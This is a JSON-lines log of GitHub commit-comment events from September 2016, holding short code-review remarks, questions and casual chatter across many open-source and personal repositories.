{"id":"4506814344","type":"CommitCommentEvent","actor":{"login":"mwperina"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18875750,"position":26,"line":26,"path":"cloud/ovirt/ovirt_vms.py","commit_id":"71992919e69397527f7feaebc384d263bb8e61da","created_at":"2016-09-02T06:29:43Z","updated_at":"2016-09-02T06:29:43Z","body":"Same as above"}},"created_at":"2016-09-02T06:29:43Z"}
{"id":"4506814660","type":"CommitCommentEvent","actor":{"login":"machacekondra"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18875751,"position":22,"line":22,"path":"cloud/ovirt/ovirt_auth.py","commit_id":"9441ba41d8e9ec8683928209a270de64ef4e7349","created_at":"2016-09-02T06:29:49Z","updated_at":"2016-09-02T06:29:49Z","body":"Oh, yes, will remove."}},"created_at":"2016-09-02T06:29:49Z"}
{"id":"4506816132","type":"CommitCommentEvent","actor":{"login":"Mellnik"},"repo":{"name":"Misiur/YSI"},"payload":{"comment":{"id":18875756,"position":null,"line":null,"path":null,"commit_id":"189e09963ea8d2e9f723a19cf695fcf87093d9f5","created_at":"2016-09-02T06:30:19Z","updated_at":"2016-09-02T06:30:19Z","body":"Are you back to business?"}},"created_at":"2016-09-02T06:30:19Z"}
{"id":"4506818070","type":"CommitCommentEvent","actor":{"login":"db4ple"},"repo":{"name":"df8oe/mchf-github"},"payload":{"comment":{"id":18875761,"position":null,"line":null,"path":null,"commit_id":"349eeae7e1f9c6703caf06ba4af137153e676377","created_at":"2016-09-02T06:30:56Z","updated_at":"2016-09-02T06:30:56Z","body":"Hi Andreas,\r\nI suggest to use RadioManagement_GetBand(freq) instead of using your own conditions to figure out if you are in the 60m Band. I.e. RadioManagement_GetBand(df.tune_new/TUNE_MULT) == BAND_MODE_60 should do the trick. "}},"created_at":"2016-09-02T06:30:56Z"}
{"id":"4506818539","type":"CommitCommentEvent","actor":{"login":"mwperina"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18875763,"position":24,"line":24,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T06:31:05Z","updated_at":"2016-09-02T06:31:05Z","body":"We don't need HAS_SDK variable as the is performed in utility module, right?"}},"created_at":"2016-09-02T06:31:05Z"}
{"id":"4506819223","type":"CommitCommentEvent","actor":{"login":"mwperina"},"repo":{"name":"machacekondra/ansible-modules-extras"},"payload":{"comment":{"id":18875766,"position":26,"line":26,"path":"cloud/ovirt/ovirt_disks.py","commit_id":"574d4f9af2f8c0f4fa77ae0ecc5bec265ca420a5","created_at":"2016-09-02T06:31:15Z","updated_at":"2016-09-02T06:31:15Z","body":"Same as above"}},"created_at":"2016-09-02T06:31:15Z"}
{"id":"4506820989","type":"CommitCommentEvent","actor":{"login":"mvrhov"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18875767,"position":502,"line":1086,"path":"sapi/litespeed/lsapi_main.c","commit_id":"413bd261ec9fd53466990bf09dc84647e2407d2c","created_at":"2016-09-02T06:31:39Z","updated_at":"2016-09-02T06:31:39Z","body":"Wrong merge. or patch with too much changes merged into the master and then into another branch"}},"created_at":"2016-09-02T06:31:39Z"}
{"id":"4506821869","type":"CommitCommentEvent","actor":{"login":"papousek"},"repo":{"name":"datoszs/CZE-The-Supreme-Administrative-Court"},"payload":{"comment":{"id":18875768,"position":null,"line":null,"path":null,"commit_id":"65d19f4772d18286c14a1c80851bba2285987f8c","created_at":"2016-09-02T06:31:51Z","updated_at":"2016-09-02T06:31:51Z","body":"@xorelvistor V Pythonu se používají standardy PEP a podle jednoho jednoho z nich (https://www.python.org/dev/peps/pep-0008/#tabs-or-spaces) se používají mezery a ne taby. "}},"created_at":"2016-09-02T06:31:51Z"}
{"id":"4506822629","type":"CommitCommentEvent","actor":{"login":"mvrhov"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18875770,"position":505,"line":1088,"path":"sapi/litespeed/lsapi_main.c","commit_id":"413bd261ec9fd53466990bf09dc84647e2407d2c","created_at":"2016-09-02T06:32:04Z","updated_at":"2016-09-02T06:32:04Z","body":"same as above"}},"created_at":"2016-09-02T06:32:04Z"}
{"id":"4506822976","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18875772,"position":null,"line":null,"path":null,"commit_id":"3906fc2f31b1882ca9c580304de193364d97bbc7","created_at":"2016-09-02T06:32:12Z","updated_at":"2016-09-02T06:32:12Z","body":"That does not work. We already had that patch. So what is the issue? Revision 1.1 should have been fine already."}},"created_at":"2016-09-02T06:32:12Z"}
{"id":"4506824074","type":"CommitCommentEvent","actor":{"login":"jkoene"},"repo":{"name":"hwi/HWIOAuthBundle"},"payload":{"comment":{"id":18875777,"position":null,"line":null,"path":null,"commit_id":"9f8e89bb97d6981b64c4e761e265550f8a615b01","created_at":"2016-09-02T06:32:35Z","updated_at":"2016-09-02T06:32:35Z","body":"@jjborie Same issue here, because of the $this->redirect($authorizationUrl)->sendHeaders(); I have 2 Location Headers which cause errors in some exotic browsers. When I remove line 274 it works as expected for me. Don't know why you already have to send the headers, the RedirectResponse will handle this right?"}},"created_at":"2016-09-02T06:32:35Z"}
{"id":"4506828781","type":"CommitCommentEvent","actor":{"login":"machacekondra"},"repo":{"name":"machacekondra/ansible"},"payload":{"comment":{"id":18875786,"position":53,"line":53,"path":"lib/ansible/utils/module_docs_fragments/ovirt.py","commit_id":"90b97cf4dbf59eab84abd673078ef1f3b0fbae81","created_at":"2016-09-02T06:34:16Z","updated_at":"2016-09-02T06:34:16Z","body":"No, the name is correct: https://pypi.python.org/pypi/ovirt-engine-sdk-python"}},"created_at":"2016-09-02T06:34:16Z"}
{"id":"4506830412","type":"CommitCommentEvent","actor":{"login":"triska"},"repo":{"name":"joshuadeleon/7languages7weeks"},"payload":{"comment":{"id":18875789,"position":null,"line":null,"path":null,"commit_id":"2d86d0b9c32c0e2d7c24803996749acea2167f30","created_at":"2016-09-02T06:34:48Z","updated_at":"2016-09-02T06:34:48Z","body":"Nice! Using `maplist/2` and `transpose/2` you can make this a lot shorter too."}},"created_at":"2016-09-02T06:34:48Z"}
{"id":"4506832479","type":"CommitCommentEvent","actor":{"login":"ruhri"},"repo":{"name":"mapserver/mapserver"},"payload":{"comment":{"id":18875795,"position":null,"line":null,"path":null,"commit_id":"b007fdb06871dc95e5b2577c0bd83d16b31459bd","created_at":"2016-09-02T06:35:30Z","updated_at":"2016-09-02T06:35:30Z","body":"@rouault \r\nHello Even,\r\nmaybe I'm wrong here, but I have an error using the latest master (01.09.2016) and I think it belongs to the topic of this commit:\r\nwhen selecting/filtering data from OGR/Spatialite for map-layer, I get an Error from mapserver, if there are no matching features in datasource (Spatialite) - which is OK in this case, because sometimes it can happen, that data for this layer is empty.\r\n\r\n[Fri Sep  2 07:09:39 2016].197319 CGI Request 4 on process 19200\r\n[Fri Sep  2 07:09:39 2016].198665 msDrawMap(): rendering using outputformat named PNG (AGG/PNG).\r\n[Fri Sep  2 07:09:39 2016].198683 msDrawMap(): WMS/WFS set-up and query, 0.000s\r\n[Fri Sep  2 07:09:39 2016].200410 msOGRFileOpen(): Falling back to MapServer only evaluation\r\n[Fri Sep  2 07:09:39 2016].200632 **msOGRFileNextShape(): OGR error. Invalid geometry field index : 0**\r\n[Fri Sep  2 07:09:39 2016].200644 msDrawMap(): Image handling error. Failed to draw layer named 'poi_unterkuenfte_aggregiert'.\r\n[Fri Sep  2 07:09:39 2016].200657 mapserv request processing time (msLoadMap not incl.): 0.003s\r\n[Fri Sep  2 07:09:39 2016].200662 msFreeMap(): freeing map at 0xdcb3a0.\r\n\r\nThis doesn't happen with datasource postgis - mapserver just returns blank image which is fine.\r\nShould I report an issue for that?"}},"created_at":"2016-09-02T06:35:30Z"}
{"id":"4506836454","type":"CommitCommentEvent","actor":{"login":"pdayang09"},"repo":{"name":"pdayang09/Barangay-Information-System"},"payload":{"comment":{"id":18875808,"position":null,"line":null,"path":null,"commit_id":"517493e6f6b27179fe7fa17f180f08b46a00ebfd","created_at":"2016-09-02T06:36:53Z","updated_at":"2016-09-02T06:36:53Z","body":"Yung pagupload ng image is nagagawa lang para sa .jpg at .png di ko pa sya nafifilter. "}},"created_at":"2016-09-02T06:36:53Z"}
{"id":"4506838380","type":"CommitCommentEvent","actor":{"login":"baekdb89"},"repo":{"name":"baekdb89/TE"},"payload":{"comment":{"id":18875816,"position":3,"line":3,"path":".gitignore","commit_id":"620a39a3f4c3d6fc09a661eabe6dcdffbcadd24d","created_at":"2016-09-02T06:37:33Z","updated_at":"2016-09-02T06:37:33Z","body":"[New Text Document.txt](https://github.com/baekdb89/TE/files/451281/New.Text.Document.txt)\r\n![vlcsnap-2016-04-08-08h38m47s313](https://cloud.githubusercontent.com/assets/12538916/18194786/0c64b70a-709d-11e6-95c6-fce51ab63402.png)\r\n"}},"created_at":"2016-09-02T06:37:33Z"}
{"id":"4506841773","type":"CommitCommentEvent","actor":{"login":"jaeilepp"},"repo":{"name":"mne-tools/mne-python"},"payload":{"comment":{"id":18875824,"position":null,"line":null,"path":null,"commit_id":"969d8b90411978f0500570004699b33dd8c4f347","created_at":"2016-09-02T06:38:42Z","updated_at":"2016-09-02T06:38:42Z","body":"Yes that did it. Thx. I wonder why it only failed for me..."}},"created_at":"2016-09-02T06:38:42Z"}
{"id":"4506848380","type":"CommitCommentEvent","actor":{"login":"ActorMing"},"repo":{"name":"ActorMing/Developer-Learn-Git"},"payload":{"comment":{"id":18875832,"position":null,"line":null,"path":null,"commit_id":"c8de11a5fb62f6fa2d9794d9deb3f452c388de59","created_at":"2016-09-02T06:40:50Z","updated_at":"2016-09-02T06:40:50Z","body":"zzzz"}},"created_at":"2016-09-02T06:40:50Z"}
{"id":"4506850555","type":"CommitCommentEvent","actor":{"login":"mwperina"},"repo":{"name":"machacekondra/ansible"},"payload":{"comment":{"id":18875834,"position":53,"line":53,"path":"lib/ansible/utils/module_docs_fragments/ovirt.py","commit_id":"90b97cf4dbf59eab84abd673078ef1f3b0fbae81","created_at":"2016-09-02T06:41:30Z","updated_at":"2016-09-02T06:41:30Z","body":"Well, it's a bit confusing for me that here you have requirement for Python name of the module and a few lines below you show how to install RPM name, but OK."}},"created_at":"2016-09-02T06:41:30Z"}
{"id":"4506851224","type":"CommitCommentEvent","actor":{"login":"louisyaphets"},"repo":{"name":"louisyaphets/testGit"},"payload":{"comment":{"id":18875836,"position":2,"line":2,"path":"README.md","commit_id":"ac50e87b18cb79104c4277b9564aad0ea2a88626","created_at":"2016-09-02T06:41:42Z","updated_at":"2016-09-02T06:41:42Z","body":"aha?"}},"created_at":"2016-09-02T06:41:42Z"}
{"id":"4506851298","type":"CommitCommentEvent","actor":{"login":"guox191"},"repo":{"name":"ElemeFE/vue-img"},"payload":{"comment":{"id":18875837,"position":6,"line":7,"path":"src/get-src.js","commit_id":"01a6e2bb5314a384014381f20031c97339d998ba","created_at":"2016-09-02T06:41:44Z","updated_at":"2016-09-02T06:41:44Z","body":"为什么删了呀"}},"created_at":"2016-09-02T06:41:44Z"}
{"id":"4506852236","type":"CommitCommentEvent","actor":{"login":"chathuranga"},"repo":{"name":"Zone24x7/redmine"},"payload":{"comment":{"id":18875839,"position":1,"line":1,"path":"app/controllers/account_controller.rb","commit_id":"30232609c729374c3520349ddd0ac903324048af","created_at":"2016-09-02T06:42:02Z","updated_at":"2016-09-02T06:42:02Z","body":"Why why all these deletion ?"}},"created_at":"2016-09-02T06:42:02Z"}
{"id":"4506853716","type":"CommitCommentEvent","actor":{"login":"ibaca"},"repo":{"name":"TOMOTON/gwt-dagger2"},"payload":{"comment":{"id":18875841,"position":120,"line":120,"path":"pom.xml","commit_id":"6f49b5396941b12f5931220d14a42bcb0f1c0113","created_at":"2016-09-02T06:42:33Z","updated_at":"2016-09-02T06:42:33Z","body":"Just curious; why don't  you like maven? It have lot of problems, but only if you don't make the things the \"standard way\". For small projects it really works perfect, most IDEs configures it perfectly, run it perfectly."}},"created_at":"2016-09-02T06:42:33Z"}
{"id":"4506856074","type":"CommitCommentEvent","actor":{"login":"meshula"},"repo":{"name":"c64kernal/USD"},"payload":{"comment":{"id":18875850,"position":null,"line":null,"path":null,"commit_id":"79fa6ccb03af80482fb0de863dd4ebd390dc32fb","created_at":"2016-09-02T06:43:18Z","updated_at":"2016-09-02T06:43:18Z","body":"Not sure why, but in my install I needed uppercase, to match results from Plugin!"}},"created_at":"2016-09-02T06:43:18Z"}
{"id":"4506856504","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/vitrivr-ui"},"payload":{"comment":{"id":18875852,"position":24,"line":54,"path":"indexArt.html","commit_id":"961d8a6b2c930f3d02119f056d32afa972ab45ae","created_at":"2016-09-02T06:43:26Z","updated_at":"2016-09-02T06:43:26Z","body":"Don't hotlink, provide all relevant JS files with the application. Otherwise it will not work correctly without an internet connection."}},"created_at":"2016-09-02T06:43:26Z"}
{"id":"4506859843","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"regalstreak/skadoosh"},"payload":{"comment":{"id":18875858,"position":null,"line":null,"path":null,"commit_id":"4573d128552e90907e0e1a04c4f591fe7780a6bc","created_at":"2016-09-02T06:44:34Z","updated_at":"2016-09-02T06:44:34Z","body":"It works ?"}},"created_at":"2016-09-02T06:44:34Z"}
{"id":"4506863806","type":"CommitCommentEvent","actor":{"login":"zhuoshuguo"},"repo":{"name":"RIOT-OS/RIOT"},"payload":{"comment":{"id":18875872,"position":2,"line":311,"path":"sys/net/gnrc/link_layer/iqueue_mac/iqueue_mac.c","commit_id":"9f05a4a943ff9432f910ad34c03517343d3e8149","created_at":"2016-09-02T06:45:51Z","updated_at":"2016-09-02T06:45:51Z","body":"Got it, will adapt soon. :-)"}},"created_at":"2016-09-02T06:45:51Z"}
{"id":"4506869347","type":"CommitCommentEvent","actor":{"login":"rouault"},"repo":{"name":"mapserver/mapserver"},"payload":{"comment":{"id":18875878,"position":null,"line":null,"path":null,"commit_id":"b007fdb06871dc95e5b2577c0bd83d16b31459bd","created_at":"2016-09-02T06:47:43Z","updated_at":"2016-09-02T06:47:43Z","body":"I don't think this is related this is related to having no features, but it would look like if the table was non spatial. If you open a ticket, please provide a minimum mapfile to reproduce, a test database and the exact request sent."}},"created_at":"2016-09-02T06:47:43Z"}
{"id":"4506869971","type":"CommitCommentEvent","actor":{"login":"machacekondra"},"repo":{"name":"machacekondra/ansible"},"payload":{"comment":{"id":18875881,"position":53,"line":53,"path":"lib/ansible/utils/module_docs_fragments/ovirt.py","commit_id":"90b97cf4dbf59eab84abd673078ef1f3b0fbae81","created_at":"2016-09-02T06:47:57Z","updated_at":"2016-09-02T06:47:57Z","body":"Hmm, right. I think I will remove  that and write the documentation on how to install it from pip, would be better. Thanks."}},"created_at":"2016-09-02T06:47:57Z"}
{"id":"4506870074","type":"CommitCommentEvent","actor":{"login":"mranugool"},"repo":{"name":"mranugool/eday"},"payload":{"comment":{"id":18875882,"position":5,"line":4,"path":"eday.asia/eday.asia/index.php","commit_id":"b5fded88816a46b84f30e2609b956cd0e6b75005","created_at":"2016-09-02T06:47:58Z","updated_at":"2016-09-02T06:47:58Z","body":"ถูกต้องแล้ว"}},"created_at":"2016-09-02T06:47:58Z"}
{"id":"4506872183","type":"CommitCommentEvent","actor":{"login":"wakaleo"},"repo":{"name":"serenity-dojo/vet-clinic"},"payload":{"comment":{"id":18875889,"position":19,"line":19,"path":"src/main/java/serenitylabs/tutorials/vetclinic/enumerations/colours/Colour.java","commit_id":"a9423325f427dd32c35a45705aef11e0d5cb0515","created_at":"2016-09-02T06:48:40Z","updated_at":"2016-09-02T06:48:40Z","body":"Why not use the enum instead of the String for the oppositeColor?"}},"created_at":"2016-09-02T06:48:40Z"}
{"id":"4506873499","type":"CommitCommentEvent","actor":{"login":"wangshuai321"},"repo":{"name":"wangshuai321/learngit2"},"payload":{"comment":{"id":18875892,"position":5,"line":3,"path":"README.md","commit_id":"0a2808a79dcb63babdf0e54d9a2f8747e1e28875","created_at":"2016-09-02T06:49:06Z","updated_at":"2016-09-02T06:49:06Z","body":"aaaaaaaaaaaaaaaa\r\n[www](url)\r\n> sssssss``"}},"created_at":"2016-09-02T06:49:06Z"}
{"id":"4506874762","type":"CommitCommentEvent","actor":{"login":"dareneuss"},"repo":{"name":"dareneuss/helloworld"},"payload":{"comment":{"id":18875893,"position":null,"line":null,"path":null,"commit_id":"8c5dfd45685780f73aac60f68283c97e55886262","created_at":"2016-09-02T06:49:29Z","updated_at":"2016-09-02T06:49:29Z","body":"This is really usefull!"}},"created_at":"2016-09-02T06:49:29Z"}
{"id":"4506876413","type":"CommitCommentEvent","actor":{"login":"McSwaggens"},"repo":{"name":"owerosu/linux-csgo-external"},"payload":{"comment":{"id":18875896,"position":null,"line":null,"path":null,"commit_id":"eaa1b8d9c4380cfa668dbdaaf53a224c773a8917","created_at":"2016-09-02T06:50:05Z","updated_at":"2016-09-02T06:50:05Z","body":"I've decided to completely re-do the terminal output.\r\nIt's [coming along nicely](http://i.imgur.com/gQtumuj.png)."}},"created_at":"2016-09-02T06:50:05Z"}
{"id":"4506876512","type":"CommitCommentEvent","actor":{"login":"Kennytian"},"repo":{"name":"Kennytian/react-native-fabric-example"},"payload":{"comment":{"id":18875898,"position":null,"line":null,"path":null,"commit_id":"48f599818043d305a3cbf1012ace551999bccd53","created_at":"2016-09-02T06:50:07Z","updated_at":"2016-09-02T06:50:07Z","body":"@zengxiang  good job"}},"created_at":"2016-09-02T06:50:07Z"}
{"id":"4506877378","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"regalstreak/skadoosh"},"payload":{"comment":{"id":18875901,"position":null,"line":null,"path":null,"commit_id":"b02b7cac9cefb8462ffd1224307fc616ac1f902c","created_at":"2016-09-02T06:50:22Z","updated_at":"2016-09-02T06:50:22Z","body":"Host kon tera baap dega?"}},"created_at":"2016-09-02T06:50:22Z"}
{"id":"4506878994","type":"CommitCommentEvent","actor":{"login":"zhuoshuguo"},"repo":{"name":"RIOT-OS/RIOT"},"payload":{"comment":{"id":18875907,"position":2,"line":311,"path":"sys/net/gnrc/link_layer/iqueue_mac/iqueue_mac.c","commit_id":"9f05a4a943ff9432f910ad34c03517343d3e8149","created_at":"2016-09-02T06:50:55Z","updated_at":"2016-09-02T06:50:55Z","body":"Anyway, if some is reviewing this PR (iQueue-MAC), I suggest you do it later, like review it two weeks later. I am going to make some big clean up and rearrangement on this PR.  "}},"created_at":"2016-09-02T06:50:55Z"}
{"id":"4506879050","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"regalstreak/skadoosh"},"payload":{"comment":{"id":18875908,"position":null,"line":null,"path":null,"commit_id":"b02b7cac9cefb8462ffd1224307fc616ac1f902c","created_at":"2016-09-02T06:50:56Z","updated_at":"2016-09-02T06:50:56Z","body":"Anyways, thanks for triggering a compression of the same rom by pushing :3\nI had to add a diff check today but you did it bc"}},"created_at":"2016-09-02T06:50:56Z"}
{"id":"4506879423","type":"CommitCommentEvent","actor":{"login":"shogo-mitomo"},"repo":{"name":"onnfetuya/sanmoku"},"payload":{"comment":{"id":18875909,"position":18,"line":18,"path":"choice.rb","commit_id":"a12bf52a36a6c9941045915e985255efc52f3f32","created_at":"2016-09-02T06:51:03Z","updated_at":"2016-09-02T06:51:03Z","body":"@onnfetuya 自分ならこう書くシリーズ\r\n```ruby\r\ndef range?(x, y)\r\n  return unless [x, y].all? { |i| (1..3).include?(i) }\r\n  puts 'foo'\r\n  puts 'bar'\r\n  true\r\nend\r\n```\r\n- さっさとリターンしてネストしないようにした\r\n- `if` の中で `!` を使うとややこしくなりがちなので、 `unless` にした\r\n- `(1..3).include?` が重複しているのでまとめた"}},"created_at":"2016-09-02T06:51:03Z"}
{"id":"4506880174","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"regalstreak/skadoosh"},"payload":{"comment":{"id":18875912,"position":null,"line":null,"path":null,"commit_id":"b02b7cac9cefb8462ffd1224307fc616ac1f902c","created_at":"2016-09-02T06:51:17Z","updated_at":"2016-09-02T06:51:17Z","body":":confused: "}},"created_at":"2016-09-02T06:51:17Z"}
{"id":"4506881388","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"regalstreak/skadoosh"},"payload":{"comment":{"id":18875915,"position":null,"line":null,"path":null,"commit_id":"b02b7cac9cefb8462ffd1224307fc616ac1f902c","created_at":"2016-09-02T06:51:40Z","updated_at":"2016-09-02T06:51:40Z","body":"I didn't push anything"}},"created_at":"2016-09-02T06:51:40Z"}
{"id":"4506881693","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"regalstreak/skadoosh"},"payload":{"comment":{"id":18875916,"position":null,"line":null,"path":null,"commit_id":"b02b7cac9cefb8462ffd1224307fc616ac1f902c","created_at":"2016-09-02T06:51:46Z","updated_at":"2016-09-02T06:51:46Z","body":"Padhai kar jake 😂"}},"created_at":"2016-09-02T06:51:46Z"}
{"id":"4506884259","type":"CommitCommentEvent","actor":{"login":"wakaleo"},"repo":{"name":"serenity-dojo/vet-clinic"},"payload":{"comment":{"id":18875920,"position":null,"line":null,"path":null,"commit_id":"a9423325f427dd32c35a45705aef11e0d5cb0515","created_at":"2016-09-02T06:52:36Z","updated_at":"2016-09-02T06:52:36Z","body":"Nice work Sayali!"}},"created_at":"2016-09-02T06:52:36Z"}
{"id":"4506884753","type":"CommitCommentEvent","actor":{"login":"mwperina"},"repo":{"name":"machacekondra/ansible"},"payload":{"comment":{"id":18875921,"position":53,"line":53,"path":"lib/ansible/utils/module_docs_fragments/ovirt.py","commit_id":"90b97cf4dbf59eab84abd673078ef1f3b0fbae81","created_at":"2016-09-02T06:52:46Z","updated_at":"2016-09-02T06:52:46Z","body":"What's more common way of installation in Ansible world: install from pip or RPM?"}},"created_at":"2016-09-02T06:52:46Z"}
{"id":"4506885864","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"regalstreak/skadoosh"},"payload":{"comment":{"id":18875924,"position":null,"line":null,"path":null,"commit_id":"b02b7cac9cefb8462ffd1224307fc616ac1f902c","created_at":"2016-09-02T06:53:08Z","updated_at":"2016-09-02T06:53:08Z","body":":100: aaenge bhai ke"}},"created_at":"2016-09-02T06:53:08Z"}
{"id":"4506888942","type":"CommitCommentEvent","actor":{"login":"im-tollu"},"repo":{"name":"im-tollu/hello-wicket"},"payload":{"comment":{"id":18875931,"position":5,"line":6,"path":"src/main/java/wicket/HomePage.java","commit_id":"6b8c4cab3b8499f19d282942dad0860a4d9576ef","created_at":"2016-09-02T06:54:04Z","updated_at":"2016-09-02T06:54:04Z","body":"Здесь написана какая-то лажа...\r\n"}},"created_at":"2016-09-02T06:54:04Z"}
{"id":"4506889590","type":"CommitCommentEvent","actor":{"login":"machacekondra"},"repo":{"name":"machacekondra/ansible"},"payload":{"comment":{"id":18875932,"position":53,"line":53,"path":"lib/ansible/utils/module_docs_fragments/ovirt.py","commit_id":"90b97cf4dbf59eab84abd673078ef1f3b0fbae81","created_at":"2016-09-02T06:54:16Z","updated_at":"2016-09-02T06:54:16Z","body":"I would definitelly say pip, because for example lot of people uses ubuntu. So that way we are not closed to rpm systems."}},"created_at":"2016-09-02T06:54:16Z"}
{"id":"4506889633","type":"CommitCommentEvent","actor":{"login":"wangning1"},"repo":{"name":"wangning1/WebSSMTemplate"},"payload":{"comment":{"id":18875933,"position":null,"line":null,"path":null,"commit_id":"6dc3e616f871d3afc8aeb91c3e4346d7554e9783","created_at":"2016-09-02T06:54:17Z","updated_at":"2016-09-02T06:54:17Z","body":"添加内容"}},"created_at":"2016-09-02T06:54:17Z"}
{"id":"4506889732","type":"CommitCommentEvent","actor":{"login":"shogo-mitomo"},"repo":{"name":"onnfetuya/sanmoku"},"payload":{"comment":{"id":18875934,"position":18,"line":18,"path":"choice.rb","commit_id":"a12bf52a36a6c9941045915e985255efc52f3f32","created_at":"2016-09-02T06:54:18Z","updated_at":"2016-09-02T06:54:18Z","body":"@onnfetuya もっと言えば `range?` メソッドの中では `puts` はしないで、こうしたい。\r\n```\r\ndef range?(x, y)\r\n  [x, y].any? { |i| (1..3).include?(i) }\r\nend\r\n```"}},"created_at":"2016-09-02T06:54:18Z"}
{"id":"4506891442","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18875938,"position":null,"line":null,"path":null,"commit_id":"cf75e6c5c2301c59706301e2ffa9d691938bf898","created_at":"2016-09-02T06:54:52Z","updated_at":"2016-09-02T06:54:52Z","body":"Thanks for the heads-up!\r\n\r\nI haven't seen that issue again so far, but I'll let you know when I do."}},"created_at":"2016-09-02T06:54:52Z"}
{"id":"4506891829","type":"CommitCommentEvent","actor":{"login":"im-tollu"},"repo":{"name":"im-tollu/hello-wicket"},"payload":{"comment":{"id":18875939,"position":2,"line":2,"path":"README.md","commit_id":"793a87aa728eb1c2abfbd0ac6a3e32c8d380a2c9","created_at":"2016-09-02T06:55:00Z","updated_at":"2016-09-02T06:55:00Z","body":"А почему эта строчка оказалась здесь?"}},"created_at":"2016-09-02T06:55:00Z"}
{"id":"4506892728","type":"CommitCommentEvent","actor":{"login":"tianzhijiexian"},"repo":{"name":"guyca/react-native"},"payload":{"comment":{"id":18875942,"position":null,"line":null,"path":null,"commit_id":"3ef51a1f17077209f57b36928cc302bca2d1a072","created_at":"2016-09-02T06:55:19Z","updated_at":"2016-09-02T06:55:19Z","body":"is it merged?"}},"created_at":"2016-09-02T06:55:19Z"}
{"id":"4506893843","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"stefankosc/express-project"},"payload":{"comment":{"id":18875946,"position":25,"line":105,"path":"index.js","commit_id":"10ca968a6ebde84ca494570268f8759b5ac447d0","created_at":"2016-09-02T06:55:41Z","updated_at":"2016-09-02T06:55:41Z","body":"It would better to do `!req.body.Age` and `!req.body.City`. If they have no length then they will be falsey. Also, if they are undefined they will be falsey. If you test for `length` when they are undefined you will get an error."}},"created_at":"2016-09-02T06:55:41Z"}
{"id":"4506894379","type":"CommitCommentEvent","actor":{"login":"mwperina"},"repo":{"name":"machacekondra/ansible"},"payload":{"comment":{"id":18875947,"position":53,"line":53,"path":"lib/ansible/utils/module_docs_fragments/ovirt.py","commit_id":"90b97cf4dbf59eab84abd673078ef1f3b0fbae81","created_at":"2016-09-02T06:55:53Z","updated_at":"2016-09-02T06:55:53Z","body":"Then +1 to mention pip everywhere."}},"created_at":"2016-09-02T06:55:53Z"}
{"id":"4506894792","type":"CommitCommentEvent","actor":{"login":"TheMolkaPL"},"repo":{"name":"BlockedServers/tracker"},"payload":{"comment":{"id":18875948,"position":38,"line":0,"path":"blockedservers","commit_id":"4edcf1703a009f520b01065de9f9af27442d7983","created_at":"2016-09-02T06:56:01Z","updated_at":"2016-09-02T06:56:01Z","body":"XD"}},"created_at":"2016-09-02T06:56:01Z"}
{"id":"4506895953","type":"CommitCommentEvent","actor":{"login":"TheMolkaPL"},"repo":{"name":"BlockedServers/tracker"},"payload":{"comment":{"id":18875951,"position":40,"line":21,"path":"blockedservers","commit_id":"4edcf1703a009f520b01065de9f9af27442d7983","created_at":"2016-09-02T06:56:23Z","updated_at":"2016-09-02T06:56:23Z","body":"XD"}},"created_at":"2016-09-02T06:56:23Z"}
{"id":"4506897467","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"regalstreak/skadoosh"},"payload":{"comment":{"id":18875953,"position":null,"line":null,"path":null,"commit_id":"b02b7cac9cefb8462ffd1224307fc616ac1f902c","created_at":"2016-09-02T06:56:52Z","updated_at":"2016-09-02T06:56:52Z","body":"😆😆\r\n\r\nBtw nice that you didn't push lol"}},"created_at":"2016-09-02T06:56:52Z"}
{"id":"4506897653","type":"CommitCommentEvent","actor":{"login":"gajender1995"},"repo":{"name":"jjaquinta/EchoSim"},"payload":{"comment":{"id":18875954,"position":null,"line":null,"path":null,"commit_id":"1070e064bb138f1f8b8fb8e97c7ad68ae31de5ab","created_at":"2016-09-02T06:56:56Z","updated_at":"2016-09-02T06:56:56Z","body":"hey jo\r\nyour code runs good can you tell me from where i can download alexa echo like any simulator \r\nThanks "}},"created_at":"2016-09-02T06:56:56Z"}
{"id":"4506899705","type":"CommitCommentEvent","actor":{"login":"navyad"},"repo":{"name":"navyad/ChatterBot"},"payload":{"comment":{"id":18875957,"position":null,"line":null,"path":null,"commit_id":"2f19f76b218baa509f63b483870ef29d161c8ce7","created_at":"2016-09-02T06:57:33Z","updated_at":"2016-09-02T06:57:33Z","body":"using __get_session() so that it cannot be accessed via adapter object."}},"created_at":"2016-09-02T06:57:33Z"}
{"id":"4506901110","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"stefankosc/express-project"},"payload":{"comment":{"id":18875959,"position":62,"line":140,"path":"index.js","commit_id":"10ca968a6ebde84ca494570268f8759b5ac447d0","created_at":"2016-09-02T06:58:01Z","updated_at":"2016-09-02T06:58:01Z","body":"Does this mean that the foreign key in one of the tables is named `id`? I would expect an `id` column in a row would be that rows primary key and foreign keys would have a different name (e.g., `user_profile_id` or `user_name_id`)"}},"created_at":"2016-09-02T06:58:01Z"}
